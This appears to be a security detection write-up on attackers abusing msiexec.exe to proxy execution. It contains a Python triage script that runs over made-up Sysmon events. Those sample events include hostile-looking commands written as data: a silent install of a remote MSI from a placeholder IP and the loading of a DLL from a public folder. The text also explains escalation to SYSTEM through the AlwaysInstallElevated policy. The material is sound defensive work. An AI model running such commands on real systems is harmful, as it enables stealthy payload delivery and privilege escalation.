Analytics Story: Windows System Binary Proxy Execution MSIExec
Description
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).
Why it matters
Adversaries may abuse msiexec.exe to launch locally stored or network-accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.
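The following is an added example, not part of the original story or of Splunk's own detection logic: a small Python triage routine that runs the five behaviours this story's detections are named after over constructed process-creation (Sysmon EventID 1 / Security 4688 style) and network-connection (Sysmon EventID 3 style) records. The event dictionaries, field names, host names and IP addresses are all made up for illustration; the matching rules are a simplified approximation of the detections, not their actual SPL.

```python
import re

# Constructed sample telemetry (not real events). Field names loosely follow
# Sysmon: event_id 1 = process creation, event_id 3 = network connection.
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\alice\Downloads\editor-setup.msi"'},
    {"event_id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "msiexec.exe /q /i http://198.51.100.7/update.msi"},
    {"event_id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /i \\fileserver01\share\tool.msi"},
    {"event_id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /y C:\Users\Public\loader.dll"},
    {"event_id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /z C:\Users\Public\loader.dll"},
    {"event_id": 1, "image": r"C:\Windows\System32\whoami.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "whoami /all"},
    {"event_id": 1, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": "msiexec.exe /V"},
    {"event_id": 3, "image": r"C:\Windows\System32\msiexec.exe",
     "dest_ip": "198.51.100.7", "dest_port": 80},
    {"event_id": 3, "image": r"C:\Program Files\Browser\browser.exe",
     "dest_ip": "203.0.113.9", "dest_port": 443},
]

# Remote payload indicators: a URL scheme or a UNC path (\\host\share\...).
REMOTE_RE = re.compile(r"\b(https?|ftp)://|\\\\[A-Za-z0-9_.-]+\\", re.IGNORECASE)
# /y registers a DLL via DllRegisterServer, /z unregisters it.
DLL_REGISTER_RE = re.compile(r"(^|\s)[/-]y\b", re.IGNORECASE)
DLL_UNREGISTER_RE = re.compile(r"(^|\s)[/-]z\b", re.IGNORECASE)
# Discovery binaries that are unusual children of an installer process.
DISCOVERY_CHILDREN = {"whoami.exe", "net.exe", "net1.exe", "ipconfig.exe",
                      "systeminfo.exe", "nltest.exe", "tasklist.exe"}
HTTP_PORTS = {80, 443, 8080, 8443}


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the list of story detections a single event would trigger."""
    hits = []
    image = basename(event["image"])
    if event["event_id"] == 1:
        parent = basename(event.get("parent_image", ""))
        cmd = event.get("cmdline", "")
        if image == "msiexec.exe":
            if REMOTE_RE.search(cmd):
                hits.append("Windows MSIExec Remote Download")
            if DLL_REGISTER_RE.search(cmd):
                hits.append("Windows MSIExec DLLRegisterServer")
            if DLL_UNREGISTER_RE.search(cmd):
                hits.append("Windows MSIExec Unregister DLLRegisterServer")
        if parent == "msiexec.exe" and image in DISCOVERY_CHILDREN:
            hits.append("Windows MSIExec Spawn Discovery Command")
    elif event["event_id"] == 3:
        if image == "msiexec.exe" and event.get("dest_port") in HTTP_PORTS:
            hits.append("Windows HTTP Network Communication From MSIExec")
    return hits


def triage(events):
    """Return (event, detections) pairs for every event that matched."""
    flagged = []
    for event in events:
        hits = classify(event)
        if hits:
            flagged.append((event, hits))
    return flagged


if __name__ == "__main__":
    for event, hits in triage(SAMPLE_EVENTS):
        label = event.get("cmdline") or f"{event['dest_ip']}:{event['dest_port']}"
        print(f"{label!r} -> {', '.join(hits)}")
```

The plain local install (first record) and the `msiexec.exe /V` service instance produce no hits, which is the point of the anomaly detections: the signal is in the argument shape (URL or UNC path, `/y` or `/z`), the parent-child relationship, or the outbound HTTP connection, not in msiexec.exe running at all. When tuning, pair these rules with a check of the AlwaysInstallElevated policy on the host, since that setting is what turns a user-level installer abuse into SYSTEM-level execution.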
Detections
| Name | Technique | Type |
|---|---|---|
| Windows MSIExec Remote Download | Msiexec | Anomaly |
| Windows HTTP Network Communication From MSIExec | Msiexec | Anomaly |
| Windows MSIExec DLLRegisterServer | Msiexec | TTP |
| Windows MSIExec Unregister DLLRegisterServer | Msiexec | TTP |
| Windows MSIExec Spawn Discovery Command | Msiexec | Anomaly |
Data Sources
| Name | Platform | Sourcetype | Source |
|---|---|---|---|
| CrowdStrike ProcessRollup2 | Other | crowdstrike:events:sensor | crowdstrike |
| Sysmon EventID 1 | | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Windows Event Log Security 4688 | | XmlWinEventLog | XmlWinEventLog:Security |
| Cisco Network Visibility Module Flow Data | | cisco:nvm:flowdata | not_applicable |
| Sysmon EventID 3 | | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
References
Source: GitHub | Version: 2